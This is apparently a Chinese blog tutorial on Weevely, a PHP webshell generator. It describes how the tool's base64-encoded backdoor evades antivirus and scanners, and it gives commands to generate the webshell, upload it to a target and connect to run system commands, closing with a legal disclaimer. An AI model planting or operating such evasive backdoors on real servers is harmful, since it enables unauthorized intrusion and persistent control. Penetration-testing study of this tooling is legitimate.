Weevely簡介
weevely項目地址:點擊查看
weevely是一款針對PHP的webshell的自由軟件,可用於模擬一個類似於telnet的連接shell,weevely通常用於web程序的漏洞利用,隱藏后門或者使用類似telnet的方式來代替web 頁面式的管理,weevely生成的服務器端php代碼是經過了base64編碼的,所以可以騙過主流的殺毒軟件和IDS,上傳服務器端代碼后通常可以通過weevely直接運行。
weevely所生成的PHP后門所使用的方法是現在比較主流的base64加密結合字符串變形技術,后門中所使用的函數均是常用的字符串處理函數,被作為檢查規則的eval,system等函數都不會直接出現在代碼中,從而可以致使后門文件繞過后門查找工具的檢查。使用暗組的Web后門查殺工具進行掃描,結果顯示該文件無任何威脅。
Weevely安裝運行
v5pingan's Blog-Weevely(PHP菜刀)-環境搭建
- 可以直接在kali上運行
root@kali:/bin# weevely

Weevely使用方法
- Linux
生成Webshell
//生成PHP-Webshell
weevely.py generate [password] [back_door_path]
//生成一個密碼為"a"的php木馬
weevely generate a webshell.php
連接后門木馬
//連接PHP后門:weevely.py URL [password] [cmd]cmd為可選
weevely http://127.0.0.1/webshell.php a
weevely實戰利用
1、利用weevely生成PHP-Webshell
weevely generate a webshell.php

2、上傳Webshell到目標服務器

3、weevely連接PHP-Webshell
weevely http://192.168.2.100/webshell.php a

4、weevely管理websehll,執行系統命令

weevely流量分析


聲明
嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 后果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合!
參考鏈接
v5pingan's Blog-Weevely(PHP菜刀)
freebuf-Weevely命令傳輸分析
weevely3后門分析
